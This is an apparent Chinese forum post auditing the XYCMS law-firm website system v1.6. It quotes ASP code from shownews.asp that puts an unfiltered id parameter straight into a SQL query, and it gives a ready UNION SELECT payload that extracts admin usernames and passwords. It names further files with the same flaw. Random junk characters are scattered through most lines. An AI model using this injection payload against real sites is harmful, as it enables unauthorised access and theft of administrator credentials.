前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似5 n9 C2 U3 k# f0 J* I- p
( U0 @6 o/ l2 o# d9 l8 J淫荡分割线
9 q0 [% f6 R' G, i; O" B* l/ ?, R--------------------------------------------------------
: G7 M7 W, p6 d) M& j
7 Q* a% u5 U2 x9 e审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
3 ~% Y8 K5 X2 V# A& F源码地址:http://down.chinaz.com/soft/29233.htm( s; q9 S, ]% O- H# N9 ?
' b6 X0 ^* i6 E: p- ~! Y3 V
漏洞文件:shownews.asp
7 R: y; x" m: Y: i4 b2 b8 G漏洞代码:7-13行
3 f3 t, M. e+ f# \- \( D0 [
. u9 d$ u& Q6 q! Q8 a3 o
) t! H N, D8 @+ g1 k<%
( e5 [' [1 Y+ w- hid=request.QueryString("id")4 t# T- {5 a1 f) t; z7 H
9 H g. w( k' a. g( z7 g, vset snews=server.createobject("adodb.recordset") / B$ m# {; m3 S
exec="select * from [news] where id="&id$ Z8 g* S2 L) d z3 ?
snews.open exec,conn,1,1
% X* _8 h0 C4 a2 l# \$ d%>
* w' O4 V% ^+ G0 P/ h6 x8 P3 b 4 a: l+ \+ _* E# r) i) A
$ k, L' \8 l, }) T2 k) u
什么过滤都没有 直造成注入
7 y( m) A) v+ Q% p% V
: c$ Y. P8 b7 M1 t. \, T3 H- g注入点:http://127.0.0.1:99/shownews.asp?id=xx
% y' ?3 V. U/ O
4 Q% ` u" F5 w+ X3 i) S' i其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
, h% Q6 d2 w* `$ x7 {+ u2 _
d! C& j0 U+ v3 ^( ?% p . Z; P4 W7 f* e! i6 f
exp: union select 1,admin,password,4,5,7 from admin_user: k, o- X3 V, r! I
_. c$ F5 w1 m _ |